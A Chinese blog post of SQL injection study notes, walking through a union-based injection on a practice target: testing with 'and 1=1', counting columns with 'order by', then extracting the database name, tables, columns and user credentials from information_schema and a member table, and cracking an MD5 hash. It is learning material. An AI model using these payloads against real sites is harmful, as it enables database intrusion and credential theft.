sql注入学习笔记

最新推荐文章于 2024-07-30 09:06:03 发布
最新推荐文章于 2024-07-30 09:06:03 发布
阅读量204 收藏 1
点赞数
分类专栏: 数据安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/rosesor/article/details/92403824
版权

基础介绍:https://blog.51cto.com/13520190/2126037

比较专业的介绍:https://blog.csdn.net/weixin_39789689/article/details/81089510

分类:https://www.cnblogs.com/JetpropelledSnake/p/9017949.html

个人向工具:http://www.vuln.cn/9027

最全爆破:https://www.cnblogs.com/spadd/p/4085544.html

技术原理:在网页上,通过MYSQL查询语句,可以查询服务器的数据库(未做安全过滤)。

实战尝试:墨客网靶场http://219.153.49.228:40125/(强烈推荐新手使用,评论多,入门简单)

主界面:

点击通知进入一个目录:

页面提交:http://219.153.49.228:40125/new_list.php?id=1

数据库执行语句:select * from news where id=1

页面返回内容正常,说明这有个注入点(?)

      

测试SQL语句

页面提交:http://219.153.49.228:40125/new_list.php?id=1 and 1=1

数据库执行语句:select * from news where id=1 and 1=1

页面显示和之前一样,测试SQL语句成功

页面提交:http://219.153.49.228:40125/new_list.php?id=1 and 1=2

数据库执行语句:select * from news where id=1 and 1=2

返回内容为空

字段判断:order by n

页面提交:http://219.153.49.228:40125/new_list.php?id=1%20order%20by%203

数据库执行语句:select * from news where id=1 order by 3

当order by 5时,返回内容为空,说明有4个字段

页面提交:http://219.153.49.228:40125/new_list.php?id=1 and 1=2 union select 1,2,3,4

这里卡了很久,因为刚开始没有加1=2,因此返回界面还是正常。加1=2是将前面的内容false掉,只显示后面的内容

数据库执行语句:select * from news where id=1 and 1=2 union select 1,2,3,4

页面返回描述:在原来的标题上位置显示为2,内容的位置显示为3

分析:通过SQL语句中and 1=2 union select 1,2,3……,n联合查询,判断显示的是哪些字段,就是原本显示标题和内容时候的查询字段,原本的查询应该是select id,title,contents,? from "table" where id=1,也就是说title标题是第2个位置显示,contents内容是在第三个位置显示。

开始爆破嘿嘿嘿

页面提交:http://219.153.49.228:49448/new_list.php?id=1%20and%201=3%20union%20select%201,database(),3,4

在2的位置显示数据库

页面提交:union select 1,2,group_concat(table_name),4 from information_schema.tables where table_schema like database()

group_concat(table_name)是将table_name连在一起,

information_schema.tables 是常见的表,可以通过它查到所以表

提交:网址+id=1+0+union select 1,2,group_concat(column_name),4 from information_schema.columns where table_name like 'StormGroup_member'

提交:union select 1,2,group_concat(name,"-",password,"-",status),4 from stormgroup_member

找到用户名和密码,可以看出是加密的,估计是md5,尝试用md5解迷

结果是dsan13和771310

 

 

 

rosesor
关注
  • 0
    点赞
  • 1
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
sql注入学习笔记(一)
w17691058648x的博客
03-11 745
SQL注入:将sql语句注入进web表单提交或输入域名或页面请求的查询字符串,最终达到欺骗服务器执行恶意的SQL命令。 具体来说就是讲sql语句注入进后台数据库中,从而达到盗取数据库数据的目的。 URL:同一资源定位符 http:// 192.168.246.130/sqli-labs-master/Less-1/ 协议 IP地址或域名...
sql注入笔记
lxw1844912514的博客
11-03 524
1.什么是sql注入sql注入是将sql代码添加到输入参数中,传递sql服务器解析并执行的一种攻击手法。 sql参数未经过滤直接拼接到sql语句当中, 解析执行,到达预想之外的效果 $sql=" select * fromwhere id=-1 OR 1=1"; //OR 1=1 条件查询整张表的 2.sql注入是怎么产生的 web开发人员无法...
AND和OR逻辑运算符的SQL注入
最新发布
qq_69100706的博客
07-30 335
在CTF(Capture The Flag)竞赛中,针对使用AND和OR逻辑运算符的SQL注入是一种常见且有效的攻击手段。当应用程序在构建SQL查询时,将用户输入与AND或OR运算符一起使用,这为攻击者提供了在查询中注入额外逻辑的机会,从而操纵查询的结果。
SQL注入学习笔记
qq_52560434的博客
09-26 1930
SQL注入大致的方法步骤原理思路注入类型SQL注入相关例题 原理 SQL注入,简单的说就是在post/getweb表单、输入域名或页面请求的查询字符串中插入SQL命令,最终使web服务器执行恶意命令的过程。 思路 (1)找注入点,构造特殊语句 (2)收集后台数据库信息,判断数据库类型,确定注入的方式。 (3)通过构造的特殊语句返回的结果,查询表名、列名、字段名以及字段值,猜解用户名和密码。 (4)找到后台可以登录的地址,进一步提权,入侵Web服务器和数据库服务器等。 注入类型 这里按照执行之后的效果来分,一
sql注入学习笔记-dvwa实战
xuqide77的博客
03-12 572
目录一、sql注入基础二、sql注入之union注入实战-dvwa1.先判断是数字型还是字符型2.使用order by查询出表的字段数量3.利用联合注入查询数据库名称、表、字段、字段数据 一、sql注入基础 sql注入就是指Web应用程序对用户输入数据的合法性没有判断,前端传入后端的参数是攻击可控的,并且参数带入数据库查询,攻击者可以通过构造不同的sql语句来实现对数据库的任意操作。 sql注入漏洞的产生需要满足两个条件 (1)参数用户可控:前端传给后端的参数内容是用户可以控制的 (2)参数带入数据库查询:
Sql注入学习笔记——MySQL显错注入
qq_44720214的博客
07-26 1262
显错注入又叫报错注入,其原理是通过利用数据库的某些机制,人为地制造错误条件使得查询结果能够出现在错误信息中。
CTFHub技能树.Web.SQL注入 WriteUp与SQL注入学习笔记
qq_45716477的博客
04-19 561
目录Level 1整数型注入字符型注入报错注入布尔盲注时间盲注欢迎使用Markdown编辑器新的改变功能快捷键合理的创建标题,有助于目录的生成如何改变文本的样式插入链接与图片如何插入一段漂亮的代码片生成一个适合你的列表创建一个表格设定内容居中、居左、居右SmartyPants创建一个自定义列表如何创建一个注脚注释也是必不可少的KaTeX数学公式新的甘特图功能,丰富你的文章UML 图表FLowchart流程图导出与导入导出导入 Level 1 整数型注入 输入1 and 1=1 和1 and 1=2 输
SQL注入(自学笔记
woqusss的博客
08-10 373
SQL注入当属漏洞之王,具有高危害性,且利用条件低,利用以及绕过检测方式多种多样。这篇笔记主要从SQL注入的危害性,以及SQL注入的条件,注入点的判断以及寻找,注入的方式以及类型,不同业务场景下对应的不同query方式利用,成功注入后应该进行的步骤,在具有root高权限账户时候应该进行的操作下,防御以及后端过滤方式和Waf绕过,一些本人见过的查询语句闭合方式。...
SQL注入笔记
02-07
SQL注入笔记 对于新手学习SQL注入很有帮助 欢迎大家查看
sql注入学习笔记
m0_52341820的博客
04-14 363
一、Mysql基础知识 1、注释 单行注释 # 多行注释 /* */ 单行注释 --空格 一般用-- + 内联注释 /*!5001*/ 注释掉的内容只有高版本的mysql才会执行 2、语句 语句/函数 解释/功能 示例 union 用来拼接两个select语句,每个查询必须拥有相同列数,结果等于等一个select语句中的列名,默认选取不同值,允许重复值用union all ...
SQL注入学习笔记
星落
11-04 1100
SQL 注入就是指 web应用程序对用户输入的数据合法性没有过滤或者是判断,前端传入的参数是攻击者可以控制,并且参数带入数据库的查询,攻击者可以通过构造恶意的 sql语句来实现对数据库的任意操作;即通过把sql命令插入到Web表单提交或输入域名或页面请求的查询字符串中,最终欺骗服务器执行恶意的SQL命令
SQL注入学习之路:sqli-labs靶场实战解析
"sqli-labs靶场练习笔记涵盖了从2关到24关的SQL注入学习内容,适合初学者参考,涉及单引号、双引号注入,布尔盲注,数据库名、表名、列名的探测,以及利用注入进行文件写入和信息获取等技能。" 在SQL注入学习过程...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值